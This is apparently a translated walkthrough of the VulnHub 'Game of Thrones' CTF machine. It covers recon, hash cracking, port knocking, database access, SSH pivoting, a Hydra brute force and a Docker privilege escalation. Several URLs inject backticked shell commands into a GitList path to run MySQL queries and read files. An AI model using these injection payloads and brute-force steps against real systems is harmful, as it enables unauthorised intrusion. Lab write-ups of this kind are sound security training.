22. Comprehensive CTF Target Machine Penetration (Part 15)

Target machine description:

Game of Thrones Hacking CTF

This is a challenge-game to measure your hacking skills. Set in Game of Thrones fantasy world.

Goal:

Get the 7 kingdom flags and the 4 extra content flags (3 secret flags + final battle flag). There are 11 in total.

Rules/guidelines to play:

  • Start your conquer of the seven kingdoms
  • You'll need hacking skills, no Game of Thrones knowledge is required. But if you play, it may contain spoilers of the TV series
  • Difficulty of the CTF: Medium-High
  • Don't forget to take your map (try to find it). It will guide you about the natural flag order to follow over the kingdoms
  • Listen CAREFULLY to the hints. If you are stuck, read the hints again!
  • Powerful fail2ban spells were cast everywhere. Bruteforce is not an option for this CTF (2 minutes ban penalty)
  • The flags are 32 chars strings. Keep'em all! you'll need them

Requirements/starting guide:

  • Import the Linux based CTF challenge virtual machine (OVA file)
  • OVA file is compatible with Oracle Virtualbox and Vmware
  • The challenge vm needs 1 cpu and 1512mb RAM to work properly
  • The challenge vm has its network configured by default as bridge. It will take an IP from the DHCP of your network

Downloading challenge CTF vm:

Troubleshooting

  • Vmware:
    • If you get a warning/error importing machine, press "Retry" and it will be imported flawlessly
  • Oracle Virtualbox
    • It's recommended to use "Import Appliance" menu option instead of double click on OVA file
    • If you get an error regarding network, just select your network interface

Good luck, the old gods and the new will protect you!


_____                      ___    _____ _                       
|   __|___ _____ ___    ___|  _|  |_   _| |_ ___ ___ ___ ___ ___ 
|  |  | .'|     | -_|  | . |  _|    | | |   |  _| . |   | -_|_ -|
|_____|__,|_|_|_|___|  |___|_|      |_| |_|_|_| |___|_|_|___|___|

Target penetration:

This time I use Parrot Linux plus Windows 10 as the attacking machines; the attacker's IP address is 192.168.0.112

The target and the attacker are on the same subnet, so we first use nmap to find the target's IP address:

Since I opened the target in VMware, the target's IP turned out to be 192.168.0.161

Then we run a deeper nmap scan against this IP:

We can see the target has quite a few ports open: 21, 22, 53, 80, 143, 3306, 5432, 10000

Let's try visiting the target's home page:

First we view the source:

...there is a pile of stuff that looks valuable... after Baidu Translate... shit... let's keep looking:

We try using dirb from Kali to brute-force the target's directories:

Many directories are found:

  • http://192.168.0.161/css/
  • http://192.168.0.161/favicon.ico
  • http://192.168.0.161/imgs/
  • http://192.168.0.161/index.php
  • http://192.168.0.161/robots.txt
  • http://192.168.0.161/sitemap.xml

And a rather odd directory:

  • http://192.168.0.161/h/i/d/d/e/n/index.php

Let's first look at the sensitive robots.txt

It contains three directories:

  • /the-tree/
  • /secret-island/
  • /direct-access-to-kings-landing/

There is also a User-agent: Three-eyed-raven

Let's visit those three directories in turn:

We click Map:

Let's study this map carefully:

It records the key points and goals of this game: besides the usual 7 flags we need to obtain, there are 3 hidden flags, and the final battle is fought over ssh...

We visit the next directory:

We view the source to see whether there is any useful information:

It contains this sentence:

You mUSt changE your own shape and foRm if you wAnt to GEt the right aNswer from the Three-eyed raven" - Written on the tree by somebody

Seeing this Three-eyed-raven, I suddenly recalled the User-agent in robots.txt, and the hint also says we need to change ourselves. Could it be that we should capture the request in Burp and replace the User-Agent header? Let's try:

The content is as follows:

<!--
                "I will give you three hints, I can see the future so listen carefully" - The three-eyed raven Bran Stark
                 "To enter in Dorne you must identify as oberynmartell. You still should find the password"
                "3487 64535 12345 . Remember these numbers, you'll need to use them with POLITE people you'll know when to use them"
                "The savages never crossed the wall. So you must look for them before crossing it"

-->


...Suddenly I have no leads. These hints will probably come in handy later. Let's visit the third directory:

View the source:

The content is: "I've heard the savages usually play music. They are not as wild as one can expect, are they?" - Sansa Stark

...Out of ideas again. We brute-forced so many directories; let's visit a few of the more sensitive ones:

Music? Something even the savages understand? Also keep the three-eyed raven's first hint in mind. Let's download the music and inspect the file metadata with exiftool:

https://sno.phy.queensu.ca/~phil/exiftool/

We can see: Savages secret flag: 8bf8854bebe108183caeb845c7676ae4

We got the first hidden flag!!! Let's look for other pages

We suddenly notice there is also a raven.php; let's try visiting it:

Again we view the source:

It says (translated): Crossing the wall, the mcrypt spell will help you. Whoever you are, only the key can open the secret door

...We continue visiting directories:

View the source:

The content is as follows:

<!--

                    "My little birds are everywhere. To enter in Dorne you must say: A_verySmallManCanCastAVeryLargeShad0w . Now, you owe me" - Lord (The Spider) Varys

                    "Powerful docker spells were cast over all kingdoms. We must be careful! You can't travel directly from one to another... usually. That's what the Lord of Light

                    has shown me" - The Red Woman Melisandre

-->

We obtained a password: A_verySmallManCanCastAVeryLargeShad0w. With it we can enter Dorne, and I recall the earlier hint:

"To enter in Dorne you must identify as oberynmartell. You still should find the password". So oberynmartell is the username, and the map hints at this as well:

I think we can try logging in to FTP as oberynmartell, with the password:

We can see the first flag has appeared, but it looks like an MD5 hash; let's try cracking it:

In the directory we find two files:

We download them:

We open the first file, problems_in_the_north.txt:

The content is as follows:
"There are problems in the north. We must travel quickly. Once there we must defend the wall" - Jon Snow
"What kind of magic is this?!? I never saw before this kind of papirus. Let's check it carefully" - Maester Aemon Targaryen
md5(md5($s).$p)
nobody:6000e084bf18c302eae4559d48cb520c$2hY68a

Clearly we need to use the scheme shown above to crack the password below.

The hashing scheme is: md5(md5($salt).$pass)

6000e084bf18c302eae4559d48cb520c$2hY68a

According to the hashcat official wiki, this scheme is only supported in hashcat-legacy.

Also, to match the format the tool expects, the "$" in the hash we obtained has to be changed to ":"

6000e084bf18c302eae4559d48cb520c:2hY68a

Save the above hash in pass.txt

The GitHub address is: https://github.com/hashcat/hashcat-legacy

But as you can see, the latest hashcat has dropped cracking of this scheme, so we need to find an old version

https://hashcat.net/files_legacy/hashcat-2.00.7z

We look up the mode number for md5(md5($salt).$pass):

Combined with the rockyou.txt wordlist that ships with Kali, the hash cracks successfully:

Cracked; the password is: stark
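To make the scheme concrete, here is an added Python example (not from the original post or from the CTF itself) that computes md5(md5($salt).$pass) the way the note describes, converts the "user:hash$salt" line into the "hash:salt" form mentioned above, and checks a handful of candidate words against it. The hash line and the recovered password "stark" are from the page; the short candidate list is constructed and stands in for rockyou.txt.

```python
import hashlib
from typing import Iterable, Optional

# Hash line as found in problems_in_the_north.txt (from the page): user:hash$salt
HASH_LINE = "nobody:6000e084bf18c302eae4559d48cb520c$2hY68a"


def md5_hex(data: str) -> str:
    """MD5 of a string as the 32-character lowercase hex digest that PHP's md5() returns."""
    return hashlib.md5(data.encode()).hexdigest()


def md5_md5salt_pass(salt: str, password: str) -> str:
    """md5(md5($salt).$pass): hash the salt, append the password to that hex digest, hash again."""
    return md5_hex(md5_hex(salt) + password)


def to_hashcat_format(line: str) -> str:
    """Convert 'user:hash$salt' into the 'hash:salt' form the cracker expects."""
    _user, rest = line.split(":", 1)
    digest, salt = rest.split("$", 1)
    return f"{digest}:{salt}"


def find_password(hash_and_salt: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose md5(md5(salt).pass) equals the digest, or None."""
    digest, salt = hash_and_salt.split(":", 1)
    for candidate in candidates:
        if md5_md5salt_pass(salt, candidate) == digest.lower():
            return candidate
    return None


if __name__ == "__main__":
    # Constructed mini wordlist standing in for rockyou.txt; "stark" is the answer the page reports.
    wordlist = ["winter", "snow", "dragon", "stark"]
    target = to_hashcat_format(HASH_LINE)
    print("hashcat-style line:", target)
    print("recovered password:", find_password(target, wordlist))
```

The check costs two MD5 calls per candidate with no work factor, which is why a wordlist run finishes in seconds; a salted but fast construction like this is no substitute for a password hash designed to be slow (bcrypt, scrypt or Argon2).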

We also got an encrypted file: the-wall.txt.nc. This reminds me of another hint:

Crossing the wall, the mcrypt spell will help you. Whoever you are, only the key can open the secret door

It feels like we can use mcrypt to cross the wall, i.e. decrypt the file, and the password is stark

OK! Decryption succeeded:

The content is as follows:

"We defended the wall. Thanks for your help. Now you can go to recover Winterfell" - Jeor Mormont, Lord Commander of the Night's Watch
"I'll write on your map this route to get faster to Winterfell. Someday I'll be a great maester" - Samwell Tarly
http://winterfell.7kingdoms.ctf/------W1nt3rf3ll------
Enter using this user/pass combination:
User: jonsnow
Pass: Ha1lt0th3k1ng1nth3n0rth!!!


There is a URL inside; let's try visiting it directly:

We add this hostname to /etc/hosts and visit again:

We log in with the username and password found above and see a page containing two images, Jon Snow and the banner of the North:

View the source to see whether there is a hint:

The content is as follows:

<!--
            Welcome to Winterfell
            You conquered the Kingdom of the North. This is your second kingdom flag!
            639bae9ac6b3e1a84cebb7b403297b79
            "We must do something here before travelling to Iron Islands, my lady" - Podrick Payne
            "Yeah, I can feel the magic on that shield. Swords are no more use here" - Brienne Tarth
 -->


We successfully got the second flag! And according to the hint, the crest on the shield is the way forward, so we download the image:

Opening it in a text editor, at the very end this passage appears:

The content is as follows:

Timef0rconqu3rs TeXT should be asked to enter into the Iron Islands fortress" - Theon Greyjoy


So the key to the next step is already here; combine it with the map's hint about the third flag:

The third target is on DNS, and the hint above indicates a TXT record may contain something; we can use nslookup to inspect the DNS records.

The simplest use of nslookup is to query the IP address for a domain name; it can query A, MX, NS, CNAME and TXT records.

The format is: nslookup -q=txt <domain> <DNS server IP>

So we build a command, query the target DNS server's TXT record, and obtain the third flag:

The output is as follows:
Server:        192.168.0.161
Address:    192.168.0.161#53
Timef0rconqu3rs.7kingdoms.ctf    text = "You conquered Iron Islands kingdom flag: 5e93de3efa544e85dcd6311732d28f95. Now you should go to Stormlands at http://stormlands.7kingdoms.ctf:10000 . Enter using this user/pass combination: aryastark/N3ddl3_1s_a_g00d_sword#!"

We got the third flag!

Another URL hint; again we add it to /etc/hosts and try port 10000:

We log in with the username and password and find this flag hint on the home page:

Viewing the source turns up nothing, so we click File Manager:

The browser also needs Java for this... I'd suggest doing it in IE... I won't go through it

Reference: http://www.freebuf.com/articles/web/175048.html

Another approach:

From the map hint we find:

The Stormlands interface is Webmin.
Once connected, it displays the version number: Webmin 1.590
I searched to see whether there was any flaw in the search field, with no result. This version is known to be vulnerable (CVE-2012-2982), and Metasploit provides an exploit module

The content is as follows:

Congratulations!you conquered Stormlands.This is your flag:8fc42c6ddf9966db3b09e84365034357

Now prepare yourself for the next challenge!

The credntials to access to the Mountain and the Vale kingdom are:

user/pass:  robinarryn/cr0wn_f0r_a_King-_

db:  mountainandthevale

pgAdmin magic will notwork.  Command line should be used on that kingdom - Talisa Maegyr


We successfully got the fourth flag! The hint gives a username and password, plus a db (database) name

Let's look at the map's hint:

...a PostgreSQL database. From the nmap scan we already knew the target runs PostgreSQL on port 5432,

and this hint asks us to access the database with the username and password from the file above; let's try connecting:

(Common PostgreSQL commands: http://www.javashuo.com/article/p-oipzmkdb-hb.html)

First we look at the table structure:

There is a flag table; looking inside, we find a long base64-encoded string:

Let's decode it:

The content is as follows:

Nice! you conquered the Kingdom of the Mountain and the Vale. This is your flag: bb3aec0fdcdbc2974890f805c585d432. Next stop the Kingdom of the Reach. You can identify yourself with this user/pass combination: olennatyrell@7kingdoms.ctf/H1gh.Gard3n.powah , but first you must be able to open the gates


We got the fifth flag! Let's look at the other useful tables in the PostgreSQL database:

select * from aryas_kill_list;

Lots of names; they may come in handy.

select * from eyrie;

select * from popular_wisdom_book;

select * from braavos_book;

The content is as follows:

    1 | City of Braavos is a very particular place. It is not so far from here.
    2 | "There is only one god, and his name is Death. And there is only one thing we say to Death: Not today" - Syrio Forel
    3 | Braavos have a lot of curious buildings. The Iron Bank of Braavos, The House of Black and White, The Titan of Braavos, etc.
    4 | "A man teaches a girl. -Valar Dohaeris- All men must serve. Faceless Men most of all" - Jaqen H'ghar
    6 | "A girl has no name" - Arya Stark
    7 | City of Braavos is ruled by the Sealord, an elected position.
    8 | "That man's life was not yours to take. A girl stole from the Many-Faced God. Now a debt is owed" - Jaqen H'ghar
    9 | Dro wkxi-pkmon qyn gkxdc iye dy mrkxqo iyeb pkmo. Ro gkxdc iye dy snoxdspi kc yxo yp iyeb usvv vscd. Covomd sd lkcon yx drsc lyyu'c vycd zkqo xewlob. Dro nkdklkco dy myxxomd gsvv lo lbkkfyc kxn iyeb zkccgybn gsvv lo: FkvkbWybqrevsc

Row 9 doesn't look like English; it looks like a rot16 encoding. Let's try decoding it at https://www.rot13.com/:

內容以下:

The many-faced god wants you to change your face. He wants you to identify as one of your kill list. Select it based on this book's lost page number. The database to connect will be braavos and your password will be: ValarMorghulis
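An added Python example (not part of the original post) showing how row 9 can be recovered without an online tool: it tries all 26 Caesar shifts and scores each candidate by how many common English words it contains. The ciphertext is the row 9 text from the page; the common-word list is constructed. It goes slightly beyond the page by detecting the shift automatically rather than assuming rot16.

```python
import string

# Row 9 of braavos_book, as printed on the page
CIPHERTEXT = (
    "Dro wkxi-pkmon qyn gkxdc iye dy mrkxqo iyeb pkmo. Ro gkxdc iye dy snoxdspi kc yxo "
    "yp iyeb usvv vscd. Covomd sd lkcon yx drsc lyyu'c vycd zkqo xewlob. Dro nkdklkco dy "
    "myxxomd gsvv lo lbkkfyc kxn iyeb zkccgybn gsvv lo: FkvkbWybqrevsc"
)

# Constructed list of very common English words: the right shift produces many of them,
# a wrong shift almost none.
COMMON_WORDS = {"the", "you", "to", "and", "of", "your", "will", "be", "it", "this", "as", "one"}


def caesar_shift(text: str, shift: int) -> str:
    """Shift every ASCII letter forward by `shift` positions (rotN); case and other characters are kept."""
    out = []
    for ch in text:
        if ch in string.ascii_lowercase:
            out.append(chr((ord(ch) - ord("a") + shift) % 26 + ord("a")))
        elif ch in string.ascii_uppercase:
            out.append(chr((ord(ch) - ord("A") + shift) % 26 + ord("A")))
        else:
            out.append(ch)
    return "".join(out)


def english_score(text: str) -> int:
    """Count the tokens that are common English words once punctuation is stripped."""
    tokens = (tok.strip(string.punctuation).lower() for tok in text.split())
    return sum(1 for tok in tokens if tok in COMMON_WORDS)


def best_shift(ciphertext: str):
    """Try all 26 shifts and return (shift, plaintext) for the one that looks most like English."""
    candidates = [(caesar_shift(ciphertext, s), s) for s in range(26)]
    plaintext, shift = max(candidates, key=lambda pair: english_score(pair[0]))
    return shift, plaintext


if __name__ == "__main__":
    shift, plaintext = best_shift(CIPHERTEXT)
    print(f"shift {shift}: {plaintext}")
```

Decoding with shift 16 is the same as saying the text was encoded with rot10; brute-forcing all shifts and scoring them is the general move whenever a CTF hint looks like shifted English but the rotation is unknown.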


I suddenly remembered our hidden flags

Now we have the database and the password; we still need to enumerate the username, and it turns out that TheRedWomanMelisandre is the username

Let's log in to the database:

We try to find useful information:

select * from temple_of_the_faceless_men;

We successfully got the second hidden flag: 3f82c41a70a8b0cfec9052252d9fd721

text: Congratulations. You've found the secret flag at City of Braavos. You've served well to the Many-Faced God.

According to the fifth flag's hint, we should now head to the Kingdom of the Reach, and we already know the

username and password for the sixth flag: olennatyrell@7kingdoms.ctf/H1gh.Gard3n.powah

Let's see what hint the map gives:

From the nmap results, IMAP runs on port 143, but that port is not open,

and earlier there was a hint: "3487 64535 12345. Remember these numbers, you'll need to use them with POLITE people, you'll know when to use them"

and the popular_wisdom_book table in the PostgreSQL database had wording like this:

OK, so we need to knock. This is a security mechanism, the port-knocking daemon (knockd). Let's look it up and see what it is.

This service hides the services a system has running by adding iptables rules dynamically, and a custom sequence of port numbers is used to "knock".

In this way the system only opens the port of the service that needs to be reached, and only then can it be accessed from outside.

When it is no longer needed, a custom sequence is used again to "close the door", shutting the port so that it no longer listens externally. This further improves the security of the service and of the system.

Port knocking is a method of opening a previously closed port from outside by means of connection attempts. Once the correct sequence of connection attempts is received, the firewall dynamically opens specific ports for the host that made the attempts.

The main purpose of port knocking is to prevent attackers from attacking a host after finding its services through port scanning.

Port knocking resembles a secret handshake protocol; in its most basic form a fixed sequence of UDP or TCP packets is sent. When a daemon running on the host captures the packets and the sequence is correct, it opens the corresponding port, or the firewall lets the client through.

Since an Internet-facing Linux server controls access by restricting IP addresses, port knocking can be used to control which IP addresses the firewall admits.
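To show how the daemon side of port knocking decides when to open a port, here is an added Python example (not part of the original post and not knockd's own code) that models knockd's per-source state machine: the ports must arrive in order, a wrong port resets the attempt, and the whole sequence must arrive within a time window. The sequence 3487 64535 12345 is from the page; the log lines are constructed in an iptables LOG style with an added ts= field, and the 10-second window is an assumption.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Set, Tuple

# The knock sequence from the three-eyed raven's hint on the page
SEQUENCE = (3487, 64535, 12345)
# Assumption: the whole sequence must arrive within this many seconds (knockd calls this seq_timeout)
WINDOW_SECONDS = 10.0

# Extract the fields we need from an iptables LOG line: source address and destination port
LOG_RE = re.compile(r"SRC=(?P<src>[\d.]+).*?DPT=(?P<dport>\d+)")

# Constructed sample log lines (iptables LOG style, with a ts= field added for the example)
SAMPLE_LOG = [
    "ts=100.0 kernel: [KNOCK] IN=eth0 SRC=192.168.0.112 DST=192.168.0.161 PROTO=TCP DPT=3487",
    "ts=100.5 kernel: [KNOCK] IN=eth0 SRC=192.168.0.112 DST=192.168.0.161 PROTO=TCP DPT=64535",
    "ts=101.0 kernel: [KNOCK] IN=eth0 SRC=192.168.0.112 DST=192.168.0.161 PROTO=TCP DPT=12345",
    # a scanner hitting the same ports in the wrong order never gets the port opened
    "ts=102.0 kernel: [KNOCK] IN=eth0 SRC=10.0.0.9 DST=192.168.0.161 PROTO=TCP DPT=64535",
    "ts=102.2 kernel: [KNOCK] IN=eth0 SRC=10.0.0.9 DST=192.168.0.161 PROTO=TCP DPT=3487",
    "ts=102.4 kernel: [KNOCK] IN=eth0 SRC=10.0.0.9 DST=192.168.0.161 PROTO=TCP DPT=12345",
    # right order but too slow: the window expires between the first and second knock
    "ts=200.0 kernel: [KNOCK] IN=eth0 SRC=10.0.0.7 DST=192.168.0.161 PROTO=TCP DPT=3487",
    "ts=215.0 kernel: [KNOCK] IN=eth0 SRC=10.0.0.7 DST=192.168.0.161 PROTO=TCP DPT=64535",
    "ts=216.0 kernel: [KNOCK] IN=eth0 SRC=10.0.0.7 DST=192.168.0.161 PROTO=TCP DPT=12345",
]


def parse_knock_line(line: str) -> Tuple[float, str, int]:
    """Return (timestamp, source IP, destination port) from one constructed log line."""
    ts = float(re.search(r"ts=([\d.]+)", line).group(1))
    m = LOG_RE.search(line)
    return ts, m.group("src"), int(m.group("dport"))


@dataclass
class KnockTracker:
    """Per-source state machine modelled on knockd: ports in order, within the window, no wrong ports."""
    sequence: Tuple[int, ...] = SEQUENCE
    window: float = WINDOW_SECONDS
    opened: Set[str] = field(default_factory=set)
    # src -> (index of the next expected port, time of the first knock of this attempt)
    progress: Dict[str, Tuple[int, float]] = field(default_factory=dict)

    def observe(self, ts: float, src: str, dport: int) -> bool:
        """Feed one knock; return True exactly when this knock completes the sequence for src."""
        idx, started = self.progress.get(src, (0, ts))
        if idx > 0 and ts - started > self.window:
            idx, started = 0, ts          # too slow: the attempt expires and starts over
        if dport != self.sequence[idx]:
            self.progress.pop(src, None)  # a wrong port (e.g. a port scan) resets the attempt
            return False
        idx += 1
        if idx == len(self.sequence):
            self.opened.add(src)          # full sequence seen: knockd would now add the iptables rule
            self.progress.pop(src, None)
            return True
        self.progress[src] = (idx, started)
        return False


def replay(lines: List[str]) -> Set[str]:
    """Run log lines through a tracker and return the sources that completed the sequence."""
    tracker = KnockTracker()
    for line in lines:
        tracker.observe(*parse_knock_line(line))
    return tracker.opened


if __name__ == "__main__":
    print("sources granted access:", replay(SAMPLE_LOG))
```

Replaying the sample shows why a port scan does not open the port: the scanner's probes hit the sequence ports in the wrong order and each wrong port resets its progress, and a source that knocks in order but too slowly never completes either. Only the source that knocks 3487, 64535, 12345 in order within the window is granted access.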

Now we use the numbers 3487 64535 12345 found earlier in the hint to try to get the target to open port 143, knocking with the knock client:

We check whether port 143 is now open:

We connect to it with netcat, using the username and password found earlier:

nc 192.168.0.161 143

The mail content obtained is as follows:

Congratulations!!

You conquered the Kingdom of the Reach. This is the flag: aee750c2009723355e2ac57564f9c3db

Now you can auth on next Kingdom (The Rock, port 1337) using this user/pass combination:

User: TywinLannister

Pass: LannisterN3verDie!

"The things I do for love…" – Jaime (Kingslayer) Lannister


We now have the sixth flag! And the hint gives the username and password for logging in to port 1337,

so we try logging in:

After logging in we find it is a GitList site; browsing around, we find a hint:

The content is as follows:

There is a note under the bed. Somebody put it there. It says:

2f686f6d652f747972696f6e6c616e6e69737465722f636865636b706f696e742e747874

"The main gates of King's Landing are permanently closed by Queen's order. You must search for another entrance"

- An anonymous friend


There is a hex-encoded string; let's decode it:

/home/tyrionlannister/checkpoint.txt looks like a useful text file, but we can't get at it

A Google search reveals that GitList has a command execution vulnerability; details:

http://hatriot.github.io/blog/2014/06/29/gitlist-rce/

The vulnerability is still present here. Great! Let's try to read the txt file directly:

The content is as follows:

Welcome to: [ASCII-art banner reading "The Rock", flattened by extraction]
You are very close to get the flag. Is not here, it's at King's Landing. We must travel there from here!
The credentials to access to King's Landing are:
user/pass: cerseilannister/_g0dsHaveNoMercy_
db: kingslanding
"Chaos isn't a pit. Chaos is a ladder" - Petyr (Littlefinger) Baelish

In any case, we found the username and password for King's Landing: cerseilannister/_g0dsHaveNoMercy_    db: kingslanding

http://192.168.0.161:1337/casterly-rock/blob/master/"--" `mysql -h 192.168.0.161 -u "cerseilannister" -p"_g0dsHaveNoMercy_" -D kingslanding --execute="show tables;" `

http://192.168.0.161:1337/casterly-rock/blob/master/"--" `mysql -h 192.168.0.161 -u "cerseilannister" -p"_g0dsHaveNoMercy_" -D kingslanding --execute="SELECT * from iron_throne;" `

This -..-. . - -.-. -..-. -- -.-- ... --.- .-.. -..-. ..-. .-.. .- --. is obviously Morse code; we decode it online:

We have a trace of the flag!
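An added Python example (not from the original post) of the Morse decoding done online above, with the matching encoder so the result can be round-tripped. The Morse string is the one from the page; note that -..-. is the Morse symbol for a literal slash, so the message is decoded with single spaces between symbols rather than treating slashes as word separators.

```python
# Morse table: ITU letters and digits plus the punctuation and prosigns that turn up in CTF hints
MORSE_TO_CHAR = {
    ".-": "A", "-...": "B", "-.-.": "C", "-..": "D", ".": "E", "..-.": "F", "--.": "G",
    "....": "H", "..": "I", ".---": "J", "-.-": "K", ".-..": "L", "--": "M", "-.": "N",
    "---": "O", ".--.": "P", "--.-": "Q", ".-.": "R", "...": "S", "-": "T", "..-": "U",
    "...-": "V", ".--": "W", "-..-": "X", "-.--": "Y", "--..": "Z",
    "-----": "0", ".----": "1", "..---": "2", "...--": "3", "....-": "4",
    ".....": "5", "-....": "6", "--...": "7", "---..": "8", "----.": "9",
    "-..-.": "/", ".-.-.-": ".", "--..--": ",", "..--..": "?", "-....-": "-",
    "..--.-": "_", "---...": ":", ".--.-.": "@", "-...-": "=", ".-.-.": "+",
}
CHAR_TO_MORSE = {char: code for code, char in MORSE_TO_CHAR.items()}

# The Morse string from the iron_throne table, as printed on the page
PAGE_MORSE = "-..-. . - -.-. -..-. -- -.-- ... --.- .-.. -..-. ..-. .-.. .- --."


def morse_decode(message: str, word_gap: str = "   ") -> str:
    """Decode Morse: one space between symbols, `word_gap` (three spaces) between words.
    A symbol that is not in the table becomes '#' so a bad transcription is visible."""
    words = []
    for word in message.strip().split(word_gap):
        letters = [MORSE_TO_CHAR.get(symbol, "#") for symbol in word.split()]
        words.append("".join(letters))
    return " ".join(words)


def morse_encode(text: str, word_gap: str = "   ") -> str:
    """Encode text to Morse using the same spacing conventions as morse_decode."""
    words = []
    for word in text.upper().split(" "):
        words.append(" ".join(CHAR_TO_MORSE[ch] for ch in word if ch in CHAR_TO_MORSE))
    return word_gap.join(words)


if __name__ == "__main__":
    print(morse_decode(PAGE_MORSE))
```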

But when we try to view this file we find it does not exist. What is going on?

After the Morse code there is one more small hint, telling us we have privileges here; let's see what they are:

http://192.168.0.161:1337/casterly-rock/blob/master/"--" `mysql -h 192.168.0.161 -u "cerseilannister" -p"_g0dsHaveNoMercy_" -D kingslanding --execute="show grants;" `

We can see file, grant, select, insert and create. My guess is that we may need to use these privileges to load the flag's contents into a new table so that we can read it.

The three-command combo:

http://192.168.0.161:1337/casterly-rock/blob/master/"--" `mysql -h 192.168.0.161 -u "cerseilannister" -p"_g0dsHaveNoMercy_" -D kingslanding --execute="CREATE TABLE test (flag TEXT);" `
http://192.168.0.161:1337/casterly-rock/blob/master/"--" `mysql -h 192.168.0.161 -u "cerseilannister" -p"_g0dsHaveNoMercy_" -D kingslanding --execute="LOAD data INFILE '/etc/mysql/flag' INTO TABLE test;" `
http://192.168.0.161:1337/casterly-rock/blob/master/"--" `mysql -h 192.168.0.161 -u "cerseilannister" -p"_g0dsHaveNoMercy_" -D kingslanding --execute="select * from test;" `

The content is as follows:

Congratulations. You conquered the last kingdom flag. This is your flag: c8d46d341bea4fd5bff866a65ff8aea9
Now you must find the Dragonglass mine to forge stronger weapons.
Ssh user-pass: daenerystargaryen-.Dracarys4thewin.
"All men must die, but we are not men" - Daenerys Stormborn of the House Targaryen, First of Her Name, the Unburnt, Queen of the Andals and the First Men, Khaleesi of the Great Grass Sea, Breaker of Chains, and Mother of Dragons


We successfully got the seventh flag! But the hint tells us it isn't over yet; we need to log in over SSH:

User: daenerystargaryen

Password: .Dracarys4thewin.

Login successful! And we find two files in /home/daenerystargaryen: checkpoint.txt and digger.txt

We look at each of them:

The content is as follows:

"Dragonglass. Frozen fire, in the tongue of old Valyria. Small wonder it is anathema to these cold children of the Other" - The Red Woman Melisandre
"Large amounts of Dragonglass can be found on Dragonglass mine (172.25.0.2). The mine can be accessed only from here. We are very close... Fail2ban magic is not present there, maybe we can reach the 'root' of the problem pivoting from outside to use this digger" - Samwell Tarly
"The White Walkers don't care if a man's free folk or crow. We're all the same to them, meat for their army. But together we can beat them" - Jon Snow

The hint says this is the only way in to 172.25.0.2, and that fail2ban is not present there, which makes brute-forcing the root password possible; moreover there is the digger.txt wordlist. We download that file with scp and brute-force with Hydra:

scp daenerystargaryen@192.168.0.161:/home/daenerystargaryen/digger.txt ./digger.txt

We use a local SSH tunnel to bind it to our port 22222:

ssh daenerystargaryen@192.168.0.161 -L 12345:172.25.0.2:22 -N

Now I use hydra to brute-force the ssh login, with root as the username and the digger.txt file as the password list:

The brute-forced root password is: Dr4g0nGl4ss!

We use this password to log in over ssh, connecting to localhost since the local tunnel is already in place:

We look at the flag:

The content is as follows:

Congratulations.
You've found the secret flag of Dragonglass mine. This is your flag: a8db1d82db78ed452ba0882fb9554fc9
Now you have the Dragonglass weapons to fight against the White Walkers.
Host's ssh:
branstark/Th3_Thr33_Ey3d_Raven
"The time has come" - The Three Eyed Raven

We got the third hidden flag! But this still isn't the end; we also received the host's ssh credentials:

branstark/Th3_Thr33_Ey3d_Raven

We connect over ssh again:

We find this server is Docker-based; a search turns up:

https://www.exploit-db.com/exploits/40394/

Docker has a local privilege-escalation vulnerability; we use Metasploit to connect:

We directly use the Docker local privilege-escalation module in msf, and find we are now root

We download the final_battle file from /root to our machine and open it:

Inside there is a flag.txt, but it needs a password to open, so we check checkpoint.txt for useful information:

The content is as follows:

To defeat White Walkers you need the help of the Savages, the Many-Faced God skill learned at Braavos and the Dragonglass weapons
Some hints:
type of file = ???
pass = ???
useful-pseudo-code-on-invented-language = concat(substr(secret_flag1, strlen(secret_flag1) - 10, strlen(secret_flag1)), substr(secret_flag2, strlen(secret_flag2) - 10, strlen(secret_flag2)), substr(secret_flag3, strlen(secret_flag3) - 10, strlen(secret_flag3)))

"Hodor... Hodor!!" - Hodor


Three secret flags are needed:

secret flag1: 8bf8854bebe108183caeb845c7676ae4

secret flag2: 3f82c41a70a8b0cfec9052252d9fd721

secret flag3: a8db1d82db78ed452ba0882fb9554fc9

The formula for the password is:

concat(

    substr(secret_flag1, strlen(secret_flag1) - 10, strlen(secret_flag1)),

    substr(secret_flag2, strlen(secret_flag2) - 10, strlen(secret_flag2)),

    substr(secret_flag3, strlen(secret_flag3) - 10, strlen(secret_flag3))

)

Write a quick bit of Python and run it:

flag1 = "8bf8854bebe108183caeb845c7676ae4"
flag2 = "3f82c41a70a8b0cfec9052252d9fd721"
flag3 = "a8db1d82db78ed452ba0882fb9554fc9"

# Take the last 10 characters of each secret flag and concatenate them,
# following the pseudo-code from checkpoint.txt
password = flag1[len(flag1)-10:len(flag1)] + flag2[len(flag2)-10:len(flag2)] + flag3[len(flag3)-10:len(flag3)]

print("password: " + password)

We run it:

The password we get is: 45c7676ae4252d9fd7212fb9554fc9

We take it to decrypt the final_battle file:

We successfully obtained the final flag!!!!

Lessons learned:

1. A flag hidden in a music file, found by analysing the audio file with exiftool. Be careful and thorough.

2. For cracking you could use John the Ripper, but my john kept reporting "No password hashes loaded (see FAQ)"; I followed https://www.waitalone.cn/john-no-password-hashes-loaded.html and still couldn't fix it...

3. The Webmin version vulnerability; some pages are written in Java now, and a browser without a Java plugin may render incomplete content.

4. Basic PostgreSQL operations and syntax

5. Port knocking with knock; nowadays mostly knockd (apt-get install knockd), also called port probing. Connecting to IMAP on port 143 with nc to check the mail.

6. The command-injection vulnerability in older GitList versions, which can be reproduced locally.

7. Using a local SSH tunnel to forward a port.

8. The local privilege-escalation vulnerability in older Docker versions, and exploiting it with msf.

9. I recommend downloading the target image from VulnHub and practising locally. Finishing this one was really exhausting

References:

http://www.freebuf.com/articles/web/177562.html

http://www.freebuf.com/articles/web/175048.html

http://devloop.users.sourceforge.net/index.php?article136/solution-du-ctf-game-of-thrones-1-de-vulnhub
